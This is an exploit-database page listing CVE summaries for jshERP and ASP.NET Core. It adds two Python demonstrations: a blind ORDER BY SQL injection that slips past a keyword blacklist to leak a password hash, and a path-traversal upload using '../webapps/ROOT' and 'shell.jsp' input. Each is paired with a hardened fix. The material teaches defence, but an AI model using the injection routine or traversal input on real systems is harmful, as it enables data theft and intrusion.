Exploit Database

145,303 exploits tracked across all sources.

CVE-2025-55315 WRITEUP CRITICAL
ASP.NET Core 2.3.0-2.3.5 - HTTP Request Smuggling via Inconsistent Request Interpretation
Inconsistent interpretation of HTTP requests ('HTTP request/response smuggling') in ASP.NET Core allows an authorized attacker to bypass a security feature over a network.
CVSS 9.9
CVE-2026-1588 WRITEUP LOW
jishenghua jshERP <= 3.6 - Path Traversal via DefaultPluginOperator install Function
A vulnerability was found in jishenghua jshERP up to 3.6 in the install function of the file /jshERP-boot/plugin/installByPath (component com.gitee.starblues.integration.operator.DefaultPluginOperator). Manipulation of the path argument results in path traversal. The attack can be launched remotely and a public exploit is available. The project was informed of the problem early through an issue report but has not responded.
CVSS 2.7
CVE-2026-1549 WRITEUP MEDIUM
jishenghua jshERP <= 3.6 - Path Traversal via PluginController configFile Parameter
A vulnerability was identified in jishenghua jshERP up to 3.6 in unspecified functionality of the file /jshERP-boot/plugin/uploadPluginConfigFile (component PluginController). Manipulation of the configFile argument leads to path traversal. The attack can be launched remotely and a public exploit is available. The project was informed of the problem early through an issue report but has not responded.
CVSS 4.3
CVE-2026-1546 WRITEUP MEDIUM
jishenghua jshERP <= 3.6 - SQL Injection via getBillItemByParam barCodes Argument
A vulnerability was detected in jishenghua jshERP up to 3.6 in the getBillItemByParam function of the file /jshERP-boot/depotItem/importItemExcel (component com.jsh.erp.datasource.mappers.DepotItemMapperEx). Manipulation of the barCodes argument leads to SQL injection. The attack can be launched remotely and a public exploit is available. The project was informed of the problem early through an issue report but has not responded.
CVSS 6.3
CVE-2025-8840 WRITEUP MEDIUM
jshERP <= 3.5 - Improper Authorization via /jshERP-boot/user/deleteBatch Endpoint
A vulnerability was determined in jshERP up to 3.5 in unspecified functionality of the /jshERP-boot/user/deleteBatch endpoint. Manipulation of the ids argument leads to improper authorization. The attack can be launched remotely and a public exploit is available. This issue is distinct from CVE-2025-7947.
CVSS 5.4
CVE-2025-8839 WRITEUP MEDIUM
jshERP <= 3.5 - Improper Authorization via User Addition Endpoint
A vulnerability was found in jshERP up to 3.5 in unspecified processing of the /jshERP-boot/user/addUser endpoint. The manipulation leads to improper authorization. The attack can be launched remotely and a public exploit is available.
CVSS 6.3
CVE-2025-7948 WRITEUP MEDIUM
jshERP <= 3.5 - Weak Password Recovery via /jshERP-boot/user/updatePwd Endpoint
A vulnerability classified as problematic was found in jshERP up to 3.5 in unspecified functionality of the file /jshERP-boot/user/updatePwd. The manipulation leads to a weak password recovery mechanism. The attack can be launched remotely and a public exploit is available.
CVSS 4.3
CVE-2025-7947 WRITEUP MEDIUM
jshERP <= 3.5 - Improper Authorization via Account Handler ID Parameter
A vulnerability classified as critical has been found in jshERP up to 3.5 in an unspecified function of the file /user/delete (component Account Handler). Manipulation of the ID argument leads to improper authorization. The attack can be launched remotely and a public exploit is available.
CVSS 5.4
CVE-2025-67344 WRITEUP MEDIUM
jshERP <= 3.5 - Stored Cross-Site Scripting via /msg/add Endpoint
jshERP v3.5 and earlier is affected by a stored Cross Site Scripting (XSS) vulnerability via the /msg/add endpoint.
CVSS 4.6
CVE-2025-67341 WRITEUP MEDIUM
jshERP <= 3.5 - Stored Cross-Site Scripting via PDF File Upload
jshERP versions 3.5 and earlier are affected by a stored XSS vulnerability. This vulnerability allows attackers to upload PDF files containing XSS payloads. Additionally, these PDF files can be accessed via static URLs, making them accessible to all users.
CVSS 4.6
CVE-2025-60801 WRITEUP HIGH
jshERP up to commit fbda24da - Unauthenticated Remote Code Execution via jsh_erp Function
jshERP up to commit fbda24da was discovered to contain an unauthenticated remote code execution (RCE) vulnerability via the jsh_erp function.
CVSS 8.2
CVE-2025-60800 WRITEUP HIGH
jshERP up to commit 90c411a - Information Disclosure via /jshERP-boot/user/info Interface
Incorrect access control in the /jshERP-boot/user/info interface of jshERP up to commit 90c411a allows attackers to access sensitive information via a crafted GET request.
CVSS 7.5
CVE-2025-55371 WRITEUP MEDIUM
jshERP 3.5 - Unauthenticated Information Disclosure via PersonController getAllList Method
Incorrect access control in the component /controller/PersonController.java of jshERP v3.5 allows unauthorized attackers to obtain all the information of the handler by executing the getAllList method.
CVSS 5.3
CVE-2025-55370 WRITEUP HIGH
jshERP 3.5 - Authorization Bypass via ResourceController ID Parameter
Incorrect access control in the component /controller/ResourceController.java of jshERP v3.5 allows unauthorized attackers to obtain all the corresponding ID data by modifying the ID value.
CVSS 8.8
CVE-2025-55368 WRITEUP HIGH
jshERP 3.5 - Unauthenticated Arbitrary Supplier Status Modification via RoleController
Incorrect access control in the component /controller/RoleController.java of jshERP v3.5 allows unauthorized attackers to arbitrarily modify the supplier status under any account.
CVSS 8.8
CVE-2025-55367 WRITEUP MEDIUM
jshERP 3.5 - Unauthenticated Arbitrary Supplier Status Modification via SupplierController
Incorrect access control in the component /controller/SupplierController.java of jshERP v3.5 allows unauthorized attackers to arbitrarily modify the supplier status under any account.
CVSS 5.3
CVE-2025-55366 WRITEUP MEDIUM
jshERP 3.5 - Improper Access Control in UserController
Incorrect access control in the component /controller/UserController.java of jshERP v3.5 allows attackers to arbitrarily reset user account passwords and execute a horizontal privilege escalation attack.
CVSS 5.3
CVE-2024-24004 WRITEUP CRITICAL
jshERP 3.3 - SQL Injection via DepotHeadController Column and Order Parameters
jshERP v3.3 is vulnerable to SQL injection. The findInOutDetail() method of com.jsh.erp.controller.DepotHeadController (returning com.jsh.erp.utils.BaseResponseInfo) does not filter the `column` and `order` parameters well enough, and an attacker can construct a malicious payload that bypasses the protection in jshERP's `safeSqlParse` method to perform SQL injection.
CVSS 9.8
CVE-2024-24003 WRITEUP CRITICAL
jshERP 3.3 - SQL Injection via DepotHeadController Column and Order Parameters
jshERP v3.3 is vulnerable to SQL injection. The findInOutMaterialCount() method of com.jsh.erp.controller.DepotHeadController (returning com.jsh.erp.utils.BaseResponseInfo) does not filter the `column` and `order` parameters well enough, and an attacker can construct a malicious payload that bypasses the protection in jshERP's `safeSqlParse` method to perform SQL injection.
CVSS 9.8
CVE-2024-24002 WRITEUP CRITICAL
jshERP 3.3 - SQL Injection via MaterialController Column and Order Parameters
jshERP v3.3 is vulnerable to SQL injection. The getListWithStock() method of com.jsh.erp.controller.MaterialController (returning com.jsh.erp.utils.BaseResponseInfo) does not filter the `column` and `order` parameters well enough, and an attacker can construct a malicious payload that bypasses the protection in jshERP's `safeSqlParse` method to perform SQL injection.
CVSS 9.8
CVE-2024-24001 WRITEUP CRITICAL
jshERP 3.3 - SQL Injection via DepotHeadController findallocationDetail Function
jshERP v3.3 is vulnerable to SQL injection via the findallocationDetail() method of com.jsh.erp.controller.DepotHeadController (returning com.jsh.erp.utils.BaseResponseInfo), which allows an attacker to construct a malicious payload that bypasses jshERP's protection mechanism.
CVSS 9.8
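The four SQL injection entries above (CVE-2024-24001 through CVE-2024-24004) describe one pattern: user-supplied sort parameters (`column`, `order`) are spliced into an ORDER BY clause behind a keyword filter. The following is an added example, not jshERP code and not taken from the advisories. It reconstructs that pattern in Python against an in-memory SQLite database. The blacklist in it is a constructed stand-in: the page names a `safeSqlParse` method but does not show its logic, so the filter here is an assumption, as are the table names, sample rows and the `jsh_user` password column. The example shows why ORDER BY cannot be protected by parameter binding, how a quote-free boolean expression leaks a stored hash one character at a time through the sort order, and the allowlist mapping that closes the hole.

```python
import re
import sqlite3

# Constructed sample data (not from jshERP): an inventory table and a user
# table whose password hash the attacker wants to read through the sort key.
MATERIALS = [("A001", "bolt", 10), ("A002", "nut", 25), ("A003", "washer", 3)]
SECRET = "secret-hash"


def connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE material (barcode TEXT, name TEXT, stock INTEGER)")
    conn.execute("CREATE TABLE jsh_user (login TEXT, password TEXT)")
    conn.executemany("INSERT INTO material VALUES (?, ?, ?)", MATERIALS)
    conn.execute("INSERT INTO jsh_user VALUES ('admin', ?)", (SECRET,))
    return conn


# Hypothetical stand-in for a keyword/character blacklist (assumption: the real
# safeSqlParse logic is not on this page). It blocks quotes, comments, stacked
# queries and a few well-known keywords, and nothing else.
_BAD = re.compile(r"['\";]|--|/\*|\b(union|sleep|benchmark)\b", re.IGNORECASE)


def blacklist_filter(value):
    if _BAD.search(value):
        raise ValueError("rejected by blacklist: %r" % value)
    return value


def list_vulnerable(conn, column, order):
    """Vulnerable pattern: the sort column and direction are spliced into the
    statement after the blacklist. ORDER BY cannot be bound as a parameter,
    so the blacklist is the only defence."""
    sql = ("SELECT barcode, name, stock FROM material ORDER BY %s %s"
           % (blacklist_filter(column), blacklist_filter(order)))
    return conn.execute(sql).fetchall()


def leak_password(conn, max_len=16):
    """Boolean inference through the sort key. The injected expression needs
    no quotes (char() builds the comparison byte) and no comments, so it
    passes the blacklist. A correct guess sorts the rows by stock ascending;
    a wrong guess sorts by -stock, i.e. reversed, which the caller can see."""
    charset = "abcdefghijklmnopqrstuvwxyz0123456789-"
    leaked = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            column = ("(SELECT CASE WHEN substr(password,%d,1)=char(%d) "
                      "THEN stock ELSE -stock END FROM jsh_user)" % (pos, ord(ch)))
            rows = list_vulnerable(conn, column, "ASC")
            if rows[0][0] == "A003":      # washer (stock 3) first => guess was right
                leaked += ch
                break
        else:
            break                         # no character matched: end of the string
    return leaked


# Hardened pattern: map the untrusted sort parameters onto a fixed allowlist
# and never let the raw strings reach the SQL text.
ALLOWED_COLUMNS = {"barcode": "barcode", "name": "name", "stock": "stock"}
ALLOWED_ORDER = {"asc": "ASC", "desc": "DESC"}


def list_hardened(conn, column, order):
    col = ALLOWED_COLUMNS.get(column.lower())
    direction = ALLOWED_ORDER.get(order.lower())
    if col is None or direction is None:
        raise ValueError("unsupported sort: column=%r order=%r" % (column, order))
    sql = "SELECT barcode, name, stock FROM material ORDER BY %s %s" % (col, direction)
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = connect()
    print("leaked through ORDER BY:", leak_password(db))
    print("hardened listing:", list_hardened(db, "stock", "asc"))
```

The dialect here is SQLite; the same correlated-subquery trick works in MySQL with its own CHAR() and SUBSTR() functions. The point of the hardened version is that the request parameter is only ever used as a dictionary key, so there is no string to filter in the first place.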
CVE-2024-24000 WRITEUP CRITICAL
jshERP 3.3 - Arbitrary File Upload via systemConfig/upload Interface
jshERP v3.3 is vulnerable to arbitrary file upload. The jshERP-boot/systemConfig/upload interface does not check the type of the uploaded file, and the biz parameter is spliced into the upload path, so an attacker can upload arbitrary files to a path they control.
CVSS 9.8
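The upload entry above (a request parameter spliced into the storage path plus no file-type check) and the two plugin path traversal entries near the top of the list (CVE-2026-1588, CVE-2026-1549, where a path or configFile argument is used directly) share one missing control: the final path is never checked to lie under the intended root. The following is an added example, not jshERP code and not taken from the advisories. It shows the vulnerable splicing pattern next to a hardened version that restricts the `biz` segment, allowlists the extension, replaces the client filename with a random one, and verifies the resolved path after symlink resolution. The upload root, extension list and attacker input are all constructed for the demonstration.

```python
import os
import re
import secrets
import tempfile

# Extensions this hypothetical upload endpoint will store (assumption); anything
# the app server would execute (.jsp, .jspx, .war, ...) is deliberately absent.
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif", ".pdf", ".xlsx"}
_BIZ_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")


def vulnerable_upload_path(root, biz, filename):
    """The pattern the advisory describes: a request parameter (biz) is spliced
    into the storage path and the client's filename is kept, so '../' segments
    and any extension reach the filesystem."""
    return os.path.normpath(os.path.join(root, biz, filename))


def is_within(root, candidate):
    """True only if candidate resolves to root or somewhere below it.
    commonpath (not startswith) avoids the '/upload' vs '/uploadX' prefix trap,
    and realpath handles symlinks on either side."""
    root_real = os.path.realpath(root)
    cand_real = os.path.realpath(candidate)
    try:
        return os.path.commonpath([root_real, cand_real]) == root_real
    except ValueError:                 # different drives on Windows
        return False


def safe_upload_path(root, biz, filename):
    """Hardened: biz must be a single allowlisted segment, the client filename
    is used only to pick an allowlisted extension, the stored name is random,
    and the result is re-checked against the root after resolution."""
    if not _BIZ_RE.fullmatch(biz):
        raise ValueError("bad biz segment: %r" % biz)
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed: %r" % ext)
    candidate = os.path.join(root, biz, secrets.token_hex(8) + ext)
    if not is_within(root, candidate):
        raise ValueError("path escapes upload root: %r" % candidate)
    return candidate


def demo():
    """Runs both versions against constructed attacker input inside a temporary
    upload root and returns (vulnerable_path_escaped, hardened_rejected)."""
    with tempfile.TemporaryDirectory() as tmp:
        upload_dir = os.path.join(tmp, "upload")
        os.mkdir(upload_dir)
        # constructed attacker input: climb out of the upload root and drop a JSP
        biz, filename = "../webapps/ROOT", "shell.jsp"
        escaped = not is_within(upload_dir, vulnerable_upload_path(upload_dir, biz, filename))
        try:
            safe_upload_path(upload_dir, biz, filename)
            rejected = False
        except ValueError:
            rejected = True
        return escaped, rejected


if __name__ == "__main__":
    print(demo())
```

The random server-side name also neutralises double-extension tricks such as `shell.jsp.png`, because nothing of the client name survives except the allowlisted suffix. Two things this check does not do, and which the stored-XSS-via-PDF entry (CVE-2025-67341) above is a reminder of: it does not validate file content against the claimed type, and it says nothing about how the file is later served; uploads reachable by static URL should be sent with `Content-Disposition: attachment` and a sandboxing Content-Security-Policy rather than rendered inline.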
CVE-2023-48894 WRITEUP MEDIUM
jshERP 3.3 - Incorrect Access Control via doFilter Function
Incorrect Access Control vulnerability in jshERP V3.3 allows attackers to obtain sensitive information via the doFilter function.
CVSS 6.5